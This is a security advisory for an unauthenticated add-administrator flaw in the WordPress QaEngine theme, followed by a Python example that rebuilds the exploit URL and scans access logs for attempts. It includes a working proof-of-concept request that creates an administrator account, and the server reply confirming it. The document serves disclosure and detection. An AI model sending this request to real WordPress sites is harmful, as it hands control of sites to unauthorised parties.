WordPress QaEngine Theme - Add Administrator




#- Title: WordPress QaEngine Theme - Add Administrator
#- Author: A. Samman
#- URL : research.evex.pw/?vuln=10
#- Date: 04/06/2015
#- Vendor: enginethemes.com
#- Download Link: enginethemes.com/themes/qaengine/
#- References :
#- OSVDB : 121267 
#- PACKETSTORM : 131648
#- WPVDB ID : 7885
#- Description : The theme registers an ae-sync-user action on admin-ajax.php that takes user_login, user_pass and role from the request and creates the account as asked. The proof of concept below sends that request with no session cookie or nonce and receives a fresh administrator account on the target site.

--------------------------------------------------------------------------------------
Proof of Concept :

http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator

Response : {"success":true,"data":{"action":"ae-sync-user","user_login":"xADMIN","user_pass":"xPASS","role":"administrator","ID":5},"msg":"Update user successful!"}
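The request above, its JSON reply and a check for the same pattern in web-server logs, as an added Python example that is not part of the original advisory or of the QaEngine theme's code. It goes beyond the advisory in one respect: besides rebuilding the proof-of-concept URL and interpreting the reply, it scans access-log lines for ae-sync-user calls. The log lines and IP addresses are constructed for the demo, and the set of roles treated as privileged is an assumption.

```python
"""Added example, not part of the original advisory or the QaEngine theme:
build the proof-of-concept request, interpret the handler's JSON reply, and
flag exploitation attempts in web-server access logs (constructed inputs)."""
import json
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Roles whose creation via ae-sync-user counts as an exploitation attempt.
# Assumption for the demo; tune to the site's role model.
PRIVILEGED_ROLES = {"administrator", "editor"}

# Combined-format access log lines, constructed for this demo.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jun/2015:10:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator HTTP/1.1" 200 152 "-" "curl/7.38.0"
198.51.100.4 - - [04/Jun/2015:10:03:45 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 48 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jun/2015:10:04:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 152 "-" "curl/7.38.0"
192.0.2.9 - - [04/Jun/2015:10:05:30 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=update&user_login=bob&role=subscriber HTTP/1.1" 200 90 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def build_poc_url(base_url, user_login, user_pass, role="administrator"):
    """Reproduce the advisory's GET request against base_url."""
    params = {
        "action": "ae-sync-user",
        "method": "create",
        "user_login": user_login,
        "user_pass": user_pass,
        "role": role,
    }
    return f"{base_url.rstrip('/')}/wp-admin/admin-ajax.php?{urlencode(params)}"


def parse_sync_user_response(body):
    """Interpret the handler's reply as (created, user_id, role).

    WordPress answers an unregistered admin-ajax action with a bare '0', so
    any non-object body means the vulnerable handler is not reachable."""
    try:
        obj = json.loads(body)
    except ValueError:
        return (False, None, None)
    if not isinstance(obj, dict):
        return (False, None, None)
    data = obj.get("data") if isinstance(obj.get("data"), dict) else {}
    return (bool(obj.get("success")), data.get("ID"), data.get("role"))


def classify_request(path):
    """Classify one logged request path; None unless it calls ae-sync-user.

    Caveat: parameters sent in a POST body never reach the access log, so a
    POST to admin-ajax.php with an empty query string is invisible here;
    cover that path with WAF or reverse-proxy logs that record bodies."""
    parts = urlsplit(path)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if q.get("action") != "ae-sync-user":
        return None
    role = q.get("role", "").lower()
    privileged = q.get("method") == "create" and role in PRIVILEGED_ROLES
    return {
        "verdict": "privileged-create" if privileged else "sync-user",
        "user_login": q.get("user_login"),
        "role": role or None,
    }


def find_exploit_attempts(log_text):
    """Return one record per ae-sync-user call found in combined-format logs."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m["path"])
        if verdict is None:
            continue
        hits.append({"ip": m["ip"], "ts": m["ts"],
                     "status": int(m["status"]), **verdict})
    return hits


if __name__ == "__main__":
    print(build_poc_url("http://www.example.com", "xADMIN", "xPASS"))
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 response to the create request is not proof on its own; the reply body decides. A patched or unaffected site returns WordPress's bare `0` (or an error object) rather than `"success":true` with a new `ID`, which is what `parse_sync_user_response` distinguishes. When checking logs, treat any `privileged-create` hit with status 200 as a likely compromise and verify the `wp_users` table for the listed `user_login`.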


